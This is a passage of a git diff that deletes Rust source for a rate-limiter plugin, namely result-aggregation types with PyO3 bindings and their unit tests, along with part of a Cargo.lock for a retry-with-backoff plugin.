- limit: *limit, - remaining: 0, - reset_timestamp, - retry_after: Some(time_to_next.max(1)), - }); - } else { - let time_to_full = - Self::token_bucket_time_to_full(*limit, remaining, *window_nanos); - let reset_timestamp = now_unix + time_to_full; - results.push(DimResult { - allowed: true, - limit: *limit, - remaining, - reset_timestamp, - retry_after: None, - }); - } - } - Ok(results) - } -} - -#[cfg(test)] -mod tests { - use super::RedisRateLimiter; - - #[test] - fn token_bucket_success_reset_uses_time_to_full() { - let window_nanos = 10_000_000_000_u64; // 10s - let limit = 10_u64; - let remaining = 9_u64; - assert_eq!( - RedisRateLimiter::token_bucket_time_to_full(limit, remaining, window_nanos), - 1 - ); - - let remaining = 5_u64; - assert_eq!( - RedisRateLimiter::token_bucket_time_to_full(limit, remaining, window_nanos), - 5 - ); - } -} diff --git a/plugins_rust/rate_limiter/src/types.rs b/plugins_rust/rate_limiter/src/types.rs deleted file mode 100644 index 864e872ff7..0000000000 --- a/plugins_rust/rate_limiter/src/types.rs +++ /dev/null @@ -1,273 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 -// -// Public result types for the rate limiter engine. -// -// `EvalResult` is the compact typed struct returned by `evaluate_many()`. -// It matches the shape described in IFACE-03 and is the only type that -// crosses the PyO3 boundary. - -use pyo3::prelude::*; -use pyo3_stub_gen::derive::*; - -/// The outcome of a single dimension check. -#[derive(Debug, Clone, Copy, PartialEq, Eq)] -pub struct DimResult { - pub allowed: bool, - /// Configured request limit for this dimension. - pub limit: u64, - /// Requests remaining in the current window (0 when blocked). - pub remaining: u64, - /// Unix timestamp when the current window resets. - pub reset_timestamp: i64, - /// Seconds until the window resets — `Some` only when blocked. - pub retry_after: Option, -} - -/// The outcome of a single active dimension, exposed to Python for -/// per-dimension inspection (e.g. which dimension blocked the request). -#[gen_stub_pyclass] -#[pyclass(get_all, from_py_object)] -#[derive(Debug, Clone)] -pub struct EvalDimension { - /// Requests remaining for this active dimension. - pub remaining: u64, - /// Unix timestamp when this dimension resets or refills. - pub reset_timestamp: i64, - /// Seconds until retry — populated only for blocked dimensions. - pub retry_after: Option, -} - -/// The aggregated result returned to Python via `evaluate_many()`. -/// -/// Contains the most restrictive outcome across all active dimensions -/// (min remaining, earliest unblock among blocked dimensions — matching -/// Python `_select_most_restrictive`). -#[gen_stub_pyclass] -#[pyclass(get_all, from_py_object)] -#[derive(Debug, Clone)] -pub struct EvalResult { - /// `True` if all active dimensions allow the request. - pub allowed: bool, - /// Configured limit for the most restrictive active dimension. - pub limit: u64, - /// Remaining requests for the most restrictive active dimension. - pub remaining: u64, - /// Unix timestamp when the most restrictive dimension resets. - pub reset_timestamp: i64, - /// Seconds until reset — populated only when `allowed == False`. - pub retry_after: Option, - /// Per-dimension outcomes that were blocked for this request. - pub violated_dimensions: Vec, - /// Per-dimension outcomes that still allowed this request. - pub allowed_dimensions: Vec, -} - -#[gen_stub_pymethods] -#[pymethods] -impl EvalResult { - fn __repr__(&self) -> String { - format!( - "EvalResult(allowed={}, limit={}, remaining={}, reset_timestamp={}, retry_after={:?})", - self.allowed, self.limit, self.remaining, self.reset_timestamp, self.retry_after - ) - } -} - -impl EvalResult { - /// Construct an "unlimited" result used when no dimensions are configured. - pub fn unlimited(reset_timestamp: i64) -> Self { - Self { - allowed: true, - limit: u64::MAX, - remaining: u64::MAX, - reset_timestamp, - retry_after: None, - violated_dimensions: Vec::new(), - allowed_dimensions: Vec::new(), - } - } - - /// Select the most restrictive result across a slice of `DimResult`s. - /// - /// Rules (matching Python `_select_most_restrictive`): - /// - Any blocked dimension → result is blocked. - /// - Among blocked: lowest `retry_after` wins (soonest retry). - /// - Among allowed: lowest `remaining` wins (closest to limit). - /// - `retry_after` is set iff the result is blocked. - /// - /// The "lowest retry_after" policy signals the next state change — the - /// caller learns when at least one dimension will re-open, even if other - /// dimensions remain blocked longer. An alternative (max) would - /// guarantee success on retry but delays the first attempt. This is a - /// deliberate product-level contract shared by both implementations. - pub fn from_dims(dims: &[DimResult]) -> Self { - if dims.is_empty() { - return Self::unlimited(0); - } - - let any_blocked = dims.iter().any(|d| !d.allowed); - let violated_dimensions: Vec = dims - .iter() - .filter(|d| !d.allowed) - .map(|d| EvalDimension { - remaining: d.remaining, - reset_timestamp: d.reset_timestamp, - retry_after: d.retry_after, - }) - .collect(); - let allowed_dimensions: Vec = dims - .iter() - .filter(|d| d.allowed) - .map(|d| EvalDimension { - remaining: d.remaining, - reset_timestamp: d.reset_timestamp, - retry_after: None, - }) - .collect(); - - if any_blocked { - // Among blocked dimensions, pick the one that unblocks soonest. - let worst = dims - .iter() - .filter(|d| !d.allowed) - .min_by_key(|d| d.retry_after.unwrap_or(i64::MAX)) - .unwrap(); - Self { - allowed: false, - limit: worst.limit, - remaining: 0, - reset_timestamp: worst.reset_timestamp, - retry_after: worst.retry_after, - violated_dimensions, - allowed_dimensions, - } - } else { - // All allowed — pick the one with the fewest remaining. - let most_restrictive = dims.iter().min_by_key(|d| d.remaining).unwrap(); - Self { - allowed: true, - limit: most_restrictive.limit, - remaining: most_restrictive.remaining, - reset_timestamp: most_restrictive.reset_timestamp, - retry_after: None, - violated_dimensions, - allowed_dimensions, - } - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - - fn dim(allowed: bool, remaining: u64, reset: i64) -> DimResult { - DimResult { - allowed, - limit: 10, - remaining, - reset_timestamp: reset, - retry_after: if allowed { None } else { Some(reset - 1000) }, - } - } - - // --- IFACE-03: EvalResult field types --- - - #[test] - fn eval_result_fields_accessible() { - let r = EvalResult { - allowed: true, - limit: 30, - remaining: 25, - reset_timestamp: 9_999_999, - retry_after: None, - violated_dimensions: Vec::new(), - allowed_dimensions: vec![EvalDimension { - remaining: 25, - reset_timestamp: 9_999_999, - retry_after: None, - }], - }; - assert!(r.allowed); - assert_eq!(r.limit, 30); - assert_eq!(r.remaining, 25); - assert_eq!(r.reset_timestamp, 9_999_999); - assert!(r.retry_after.is_none()); - } - - #[test] - fn eval_result_retry_after_populated_when_blocked() { - let r = EvalResult { - allowed: false, - limit: 30, - remaining: 0, - reset_timestamp: 9_999_999, - retry_after: Some(42), - violated_dimensions: vec![EvalDimension { - remaining: 0, - reset_timestamp: 9_999_999, - retry_after: Some(42), - }], - allowed_dimensions: Vec::new(), - }; - assert!(!r.allowed); - assert_eq!(r.retry_after, Some(42)); - } - - // --- CORR-07: from_dims aggregation --- - - #[test] - fn from_dims_empty_is_unlimited() { - let r = EvalResult::from_dims(&[]); - assert!(r.allowed); - assert_eq!(r.limit, u64::MAX); - assert!(r.allowed_dimensions.is_empty()); - assert!(r.violated_dimensions.is_empty()); - } - - #[test] - fn from_dims_all_allowed_picks_min_remaining() { - let dims = vec![dim(true, 20, 2000), dim(true, 5, 1500), dim(true, 15, 1800)]; - let r = EvalResult::from_dims(&dims); - assert!(r.allowed); - assert_eq!(r.remaining, 5); - assert_eq!(r.reset_timestamp, 1500); - assert!(r.retry_after.is_none()); - assert_eq!(r.allowed_dimensions.len(), 3); - assert!(r.violated_dimensions.is_empty()); - } - - #[test] - fn from_dims_any_blocked_result_is_blocked() { - let dims = vec![dim(true, 5, 1500), dim(false, 0, 2000), dim(true, 10, 1800)]; - let r = EvalResult::from_dims(&dims); - assert!(!r.allowed); - assert_eq!(r.remaining, 0); - assert_eq!(r.allowed_dimensions.len(), 2); - assert_eq!(r.violated_dimensions.len(), 1); - } - - #[test] - fn from_dims_multiple_blocked_picks_soonest_retry() { - let dims = vec![ - dim(false, 0, 3000), - dim(false, 0, 1000), - dim(false, 0, 2000), - ]; - let r = EvalResult::from_dims(&dims); - assert!(!r.allowed); - assert_eq!(r.reset_timestamp, 1000); - assert_eq!(r.retry_after, Some(0)); - assert_eq!(r.violated_dimensions.len(), 3); - } - - #[test] - fn from_dims_retry_after_none_when_allowed() { - let dims = vec![dim(true, 1, 9000)]; - let r = EvalResult::from_dims(&dims); - assert!(r.retry_after.is_none()); - assert_eq!(r.allowed_dimensions[0].remaining, 1); - assert_eq!(r.allowed_dimensions[0].reset_timestamp, 9000); - } -} diff --git a/plugins_rust/retry_with_backoff/Cargo.lock b/plugins_rust/retry_with_backoff/Cargo.lock deleted file mode 100644 index 999acde1f4..0000000000 --- a/plugins_rust/retry_with_backoff/Cargo.lock +++ /dev/null @@ -1,1056 +0,0 @@ -# This file is automatically @generated by Cargo. -# It is not intended for manual editing. -version = 4 - -[[package]] -name = "android_system_properties" -version = "0.1.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "819e7219dbd41043ac279b19830f2efc897156490d7fd6ea916720117ee66311" -dependencies = [ - "libc", -] - -[[package]] -name = "anyhow" -version = "1.0.102" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7f202df86484c868dbad7eaa557ef785d5c66295e41b460ef922eca0723b842c" - -[[package]] -name = "arc-swap" -version = "1.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a07d1f37ff60921c83bdfc7407723bdefe89b44b98a9b772f225c8f9d67141a6" -dependencies = [ - "rustversion", -] - -[[package]] -name = "autocfg" -version = "1.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c08606f8c3cbf4ce6ec8e28fb0014a2c086708fe954eaa885384a6165172e7e8" - -[[package]] -name = "bumpalo" -version = "3.20.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5d20789868f4b01b2f2caec9f5c4e0213b41e3e5702a50157d699ae31ced2fcb" - -[[package]] -name = "cc" -version = "1.2.57" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7a0dd1ca384932ff3641c8718a02769f1698e7563dc6974ffd03346116310423" -dependencies = [ - "find-msvc-tools", - "shlex", -] - -[[package]] -name = "cfg-if" -version = "1.0.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9330f8b2ff13f34540b44e946ef35111825727b38d33286ef986142615121801" - -[[package]] -name = "chrono" -version = "0.4.44" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c673075a2e0e5f4a1dde27ce9dee1ea4558c7ffe648f576438a20ca1d2acc4b0" -dependencies = [ - "iana-time-zone", - "js-sys", - "num-traits", - "wasm-bindgen", - "windows-link", -] - -[[package]] -name = "core-foundation-sys" -version = "0.8.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "773648b94d0e5d620f64f280777445740e61fe701025087ec8b57f45c791888b" - -[[package]] -name = "crunchy" -version = "0.2.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "460fbee9c2c2f33933d720630a6a0bac33ba7053db5344fac858d4b8952d77d5" - -[[package]] -name = "deranged" -version = "0.5.8" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7cd812cc2bc1d69d4764bd80df88b4317eaef9e773c75226407d9bc0876b211c" -dependencies = [ - "powerfmt", -] - -[[package]] -name = "either" -version = "1.15.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "48c757948c5ede0e46177b7add2e67155f70e33c07fea8284df6576da70b3719" - -[[package]] -name = "equivalent" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "877a4ace8713b0bcf2a4e7eec82529c029f1d0619886d18145fea96c3ffe5c0f" - -[[package]] -name = "find-msvc-tools" -version = "0.1.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5baebc0774151f905a1a2cc41989300b1e6fbb29aff0ceffa1064fdd3088d582" - -[[package]] -name = "getopts" -version = "0.2.24" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cfe4fbac503b8d1f88e6676011885f34b7174f46e59956bba534ba83abded4df" -dependencies = [ - "unicode-width", -] - -[[package]] -name = "getrandom" -version = "0.2.17" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ff2abc00be7fca6ebc474524697ae276ad847ad0a6b3faa4bcb027e9a4614ad0" -dependencies = [ - "cfg-if", - "libc", - "wasi", -] - -[[package]] -name = "hashbrown" -version = "0.16.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100" - -[[package]] -name = "heck" -version = "0.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea" - -[[package]] -name = "iana-time-zone" -version = "0.1.65" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e31bc9ad994ba00e440a8aa5c9ef0ec67d5cb5e5cb0cc7f8b744a35b389cc470" -dependencies = [ - "android_system_properties", - "core-foundation-sys", - "iana-time-zone-haiku", - "js-sys", - "log", - "wasm-bindgen", - "windows-core", -] - -[[package]] -name = "iana-time-zone-haiku" -version = "0.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f31827a206f56af32e590ba56d5d2d085f558508192593743f16b2306495269f" -dependencies = [ - "cc", -] - -[[package]] -name = "indexmap" -version = "2.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7714e70437a7dc3ac8eb7e6f8df75fd8eb422675fc7678aff7364301092b1017" -dependencies = [ - "equivalent", - "hashbrown", -] - -[[package]] -name = "inventory" -version = "0.3.22" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "009ae045c87e7082cb72dab0ccd01ae075dd00141ddc108f43a0ea150a9e7227" -dependencies = [ - "rustversion", -] - -[[package]] -name = "is-macro" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1d57a3e447e24c22647738e4607f1df1e0ec6f72e16182c4cd199f647cdfb0e4" -dependencies = [ - "heck", - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "itertools" -version = "0.11.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b1c173a5686ce8bfa551b3563d0c2170bf24ca44da99c7ca4bfdab5418c3fe57" -dependencies = [ - "either", -] - -[[package]] -name = "itertools" -version = "0.14.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2b192c782037fadd9cfa75548310488aabdbf3d2da73885b31bd0abd03351285" -dependencies = [ - "either", -] - -[[package]] -name = "itoa" -version = "1.0.18" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8f42a60cbdf9a97f5d2305f08a87dc4e09308d1276d28c869c684d7777685682" - -[[package]] -name = "js-sys" -version = "0.3.91" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b49715b7073f385ba4bc528e5747d02e66cb39c6146efb66b781f131f0fb399c" -dependencies = [ - "once_cell", - "wasm-bindgen", -] - -[[package]] -name = "lalrpop-util" -version = "0.20.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "507460a910eb7b32ee961886ff48539633b788a36b65692b95f225b844c82553" - -[[package]] -name = "libc" -version = "0.2.183" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b5b646652bf6661599e1da8901b3b9522896f01e736bad5f723fe7a3a27f899d" - -[[package]] -name = "log" -version = "0.4.29" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897" - -[[package]] -name = "maplit" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3e2e65a1a2e43cfcb47a895c4c8b10d1f4a61097f9f254f183aee60cad9c651d" - -[[package]] -name = "matrixmultiply" -version = "0.3.10" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a06de3016e9fae57a36fd14dba131fccf49f74b40b7fbdb472f96e361ec71a08" -dependencies = [ - "autocfg", - "rawpointer", -] - -[[package]] -name = "memchr" -version = "2.8.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8ca58f447f06ed17d5fc4043ce1b10dd205e060fb3ce5b979b8ed8e59ff3f79" - -[[package]] -name = "ndarray" -version = "0.17.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "520080814a7a6b4a6e9070823bb24b4531daac8c4627e08ba5de8c5ef2f2752d" -dependencies = [ - "matrixmultiply", - "num-complex", - "num-integer", - "num-traits", - "portable-atomic", - "portable-atomic-util", - "rawpointer", -] - -[[package]] -name = "num-bigint" -version = "0.4.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a5e44f723f1133c9deac646763579fdb3ac745e418f2a7af9cd0c431da1f20b9" -dependencies = [ - "num-integer", - "num-traits", -] - -[[package]] -name = "num-complex" -version = "0.4.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "73f88a1307638156682bada9d7604135552957b7818057dcef22705b4d509495" -dependencies = [ - "num-traits", -] - -[[package]] -name = "num-conv" -version = "0.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c6673768db2d862beb9b39a78fdcb1a69439615d5794a1be50caa9bc92c81967" - -[[package]] -name = "num-integer" -version = "0.1.46" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7969661fd2958a5cb096e56c8e1ad0444ac2bbcd0061bd28660485a44879858f" -dependencies = [ - "num-traits", -] - -[[package]] -name = "num-traits" -version = "0.2.19" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "071dfc062690e90b734c0b2273ce72ad0ffa95f0c74596bc250dcfd960262841" -dependencies = [ - "autocfg", -] - -[[package]] -name = "numpy" -version = "0.28.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "778da78c64ddc928ebf5ad9df5edf0789410ff3bdbf3619aed51cd789a6af1e2" -dependencies = [ - "libc", - "ndarray", - "num-complex", - "num-integer", - "num-traits", - "pyo3", - "pyo3-build-config", - "rustc-hash 2.1.1", -] - -[[package]] -name = "once_cell" -version = "1.21.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9f7c3e4beb33f85d45ae3e3a1792185706c8e16d043238c593331cc7cd313b50" - -[[package]] -name = "ordered-float" -version = "5.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7f4779c6901a562440c3786d08192c6fbda7c1c2060edd10006b05ee35d10f2d" -dependencies = [ - "num-traits", -] - -[[package]] -name = "phf" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1fd6780a80ae0c52cc120a26a1a42c1ae51b247a253e4e06113d23d2c2edd078" -dependencies = [ - "phf_shared", -] - -[[package]] -name = "phf_codegen" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "aef8048c789fa5e851558d709946d6d79a8ff88c0440c587967f8e94bfb1216a" -dependencies = [ - "phf_generator", - "phf_shared", -] - -[[package]] -name = "phf_generator" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3c80231409c20246a13fddb31776fb942c38553c51e871f8cbd687a4cfb5843d" -dependencies = [ - "phf_shared", - "rand", -] - -[[package]] -name = "phf_shared" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "67eabc2ef2a60eb7faa00097bd1ffdb5bd28e62bf39990626a582201b7a754e5" -dependencies = [ - "siphasher", -] - -[[package]] -name = "portable-atomic" -version = "1.13.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c33a9471896f1c69cecef8d20cbe2f7accd12527ce60845ff44c153bb2a21b49" - -[[package]] -name = "portable-atomic-util" -version = "0.2.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "091397be61a01d4be58e7841595bd4bfedb15f1cd54977d79b8271e94ed799a3" -dependencies = [ - "portable-atomic", -] - -[[package]] -name = "powerfmt" -version = "0.2.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "439ee305def115ba05938db6eb1644ff94165c5ab5e9420d1c1bcedbba909391" - -[[package]] -name = "ppv-lite86" -version = "0.2.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "85eae3c4ed2f50dcfe72643da4befc30deadb458a9b590d720cde2f2b1e97da9" -dependencies = [ - "zerocopy", -] - -[[package]] -name = "proc-macro2" -version = "1.0.106" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8fd00f0bb2e90d81d1044c2b32617f68fcb9fa3bb7640c23e9c748e53fb30934" -dependencies = [ - "unicode-ident", -] - -[[package]] -name = "pyo3" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cf85e27e86080aafd5a22eae58a162e133a589551542b3e5cee4beb27e54f8e1" -dependencies = [ - "libc", - "once_cell", - "portable-atomic", - "pyo3-build-config", - "pyo3-ffi", - "pyo3-macros", -] - -[[package]] -name = "pyo3-build-config" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8bf94ee265674bf76c09fa430b0e99c26e319c945d96ca0d5a8215f31bf81cf7" -dependencies = [ - "target-lexicon", -] - -[[package]] -name = "pyo3-ffi" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "491aa5fc66d8059dd44a75f4580a2962c1862a1c2945359db36f6c2818b748dc" -dependencies = [ - "libc", - "pyo3-build-config", -] - -[[package]] -name = "pyo3-log" -version = "0.13.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "26c2ec80932c5c3b2d4fbc578c9b56b2d4502098587edb8bef5b6bfcad43682e" -dependencies = [ - "arc-swap", - "log", - "pyo3", -] - -[[package]] -name = "pyo3-macros" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f5d671734e9d7a43449f8480f8b38115df67bef8d21f76837fa75ee7aaa5e52e" -dependencies = [ - "proc-macro2", - "pyo3-macros-backend", - "quote", - "syn", -] - -[[package]] -name = "pyo3-macros-backend" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "22faaa1ce6c430a1f71658760497291065e6450d7b5dc2bcf254d49f66ee700a" -dependencies = [ - "heck", - "proc-macro2", - "pyo3-build-config", - "quote", - "syn", -] - -[[package]] -name = "pyo3-stub-gen" -version = "0.19.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b159f7704044f57d058f528a6f1f22a0a0a327dcb595c5fb38beae658e0338d6" -dependencies = [ - "anyhow", - "chrono", - "either", - "indexmap", - "inventory", - "itertools 0.14.0", - "log", - "maplit", - "num-complex", - "numpy", - "ordered-float", - "pyo3", - "pyo3-stub-gen-derive", - "rustpython-parser", - "serde", - "serde_json", - "time", - "toml", -] - -[[package]] -name = "pyo3-stub-gen-derive" -version = "0.19.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a8c79e7c5b1fcec7c39ab186594658a971c59911eb6fbab5a5932cf2318534be" -dependencies = [ - "heck", - "indexmap", - "proc-macro2", - "quote", - "rustpython-parser", - "syn", -] - -[[package]] -name = "quote" -version = "1.0.45" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "41f2619966050689382d2b44f664f4bc593e129785a36d6ee376ddf37259b924" -dependencies = [ - "proc-macro2", -] - -[[package]] -name = "rand" -version = "0.8.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404" -dependencies = [ - "libc", - "rand_chacha", - "rand_core", -] - -[[package]] -name = "rand_chacha" -version = "0.3.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88" -dependencies = [ - "ppv-lite86", - "rand_core", -] - -[[package]] -name = "rand_core" -version = "0.6.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c" -dependencies = [ - "getrandom", -] - -[[package]] -name = "rawpointer" -version = "0.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "60a357793950651c4ed0f3f52338f53b2f809f32d83a07f72909fa13e4c6c1e3" - -[[package]] -name = "retry_with_backoff" -version = "0.1.0" -dependencies = [ - "log", - "pyo3", - "pyo3-log", - "pyo3-stub-gen", - "rand", -] - -[[package]] -name = "rustc-hash" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "08d43f7aa6b08d49f382cde6a7982047c3426db949b1424bc4b7ec9ae12c6ce2" - -[[package]] -name = "rustc-hash" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "357703d41365b4b27c590e3ed91eabb1b663f07c4c084095e60cbed4362dff0d" - -[[package]] -name = "rustpython-ast" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4cdaf8ee5c1473b993b398c174641d3aa9da847af36e8d5eb8291930b72f31a5" -dependencies = [ - "is-macro", - "num-bigint", - "rustpython-parser-core", - "static_assertions", -] - -[[package]] -name = "rustpython-parser" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "868f724daac0caf9bd36d38caf45819905193a901e8f1c983345a68e18fb2abb" -dependencies = [ - "anyhow", - "is-macro", - "itertools 0.11.0", - "lalrpop-util", - "log", - "num-bigint", - "num-traits", - "phf", - "phf_codegen", - "rustc-hash 1.1.0", - "rustpython-ast", - "rustpython-parser-core", - "tiny-keccak", - "unic-emoji-char", - "unic-ucd-ident", - "unicode_names2", -] - -[[package]] -name = "rustpython-parser-core" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b4b6c12fa273825edc7bccd9a734f0ad5ba4b8a2f4da5ff7efe946f066d0f4ad" -dependencies = [ - "is-macro", - "memchr", - "rustpython-parser-vendored", -] - -[[package]] -name = "rustpython-parser-vendored" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "04fcea49a4630a3a5d940f4d514dc4f575ed63c14c3e3ed07146634aed7f67a6" -dependencies = [ - "memchr", - "once_cell", -] - -[[package]] -name = "rustversion" -version = "1.0.22" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b39cdef0fa800fc44525c84ccb54a029961a8215f9619753635a9c0d2538d46d" - -[[package]] -name = "serde" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9a8e94ea7f378bd32cbbd37198a4a91436180c5bb472411e48b5ec2e2124ae9e" -dependencies = [ - "serde_core", - "serde_derive", -] - -[[package]] -name = "serde_core" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "41d385c7d4ca58e59fc732af25c3983b67ac852c1a25000afe1175de458b67ad" -dependencies = [ - "serde_derive", -] - -[[package]] -name = "serde_derive" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d540f220d3187173da220f885ab66608367b6574e925011a9353e4badda91d79" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "serde_json" -version = "1.0.149" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "83fc039473c5595ace860d8c4fafa220ff474b3fc6bfdb4293327f1a37e94d86" -dependencies = [ - "itoa", - "memchr", - "serde", - "serde_core", - "zmij", -] - -[[package]] -name = "serde_spanned" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "876ac351060d4f882bb1032b6369eb0aef79ad9df1ea8bc404874d8cc3d0cd98" -dependencies = [ - "serde_core", -] - -[[package]] -name = "shlex" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64" - -[[package]] -name = "siphasher" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b2aa850e253778c88a04c3d7323b043aeda9d3e30d5971937c1855769763678e" - -[[package]] -name = "static_assertions" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f" - -[[package]] -name = "syn" -version = "2.0.117" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e665b8803e7b1d2a727f4023456bbbbe74da67099c585258af0ad9c5013b9b99" -dependencies = [ - "proc-macro2", - "quote", - "unicode-ident", -] - -[[package]] -name = "target-lexicon" -version = "0.13.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "adb6935a6f5c20170eeceb1a3835a49e12e19d792f6dd344ccc76a985ca5a6ca" - -[[package]] -name = "time" -version = "0.3.47" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "743bd48c283afc0388f9b8827b976905fb217ad9e647fae3a379a9283c4def2c" -dependencies = [ - "deranged", - "num-conv", - "powerfmt", - "serde_core", - "time-core", -] - -[[package]] -name = "time-core" -version = "0.1.8" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7694e1cfe791f8d31026952abf09c69ca6f6fa4e1a1229e18988f06a04a12dca" - -[[package]] -name = "tiny-keccak" -version = "2.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2c9d3793400a45f954c52e73d068316d76b6f4e36977e3fcebb13a2721e80237" -dependencies = [ - "crunchy", -] - -[[package]] -name = "toml" -version = "1.1.0+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8195ca05e4eb728f4ba94f3e3291661320af739c4e43779cbdfae82ab239fcc" -dependencies = [ - "indexmap", - "serde_core", - "serde_spanned", - "toml_datetime", - "toml_parser", - "toml_writer", - "winnow", -] - -[[package]] -name = "toml_datetime" -version = "1.1.0+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "97251a7c317e03ad83774a8752a7e81fb6067740609f75ea2b585b569a59198f" -dependencies = [ - "serde_core", -] - -[[package]] -name = "toml_parser" -version = "1.1.0+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = 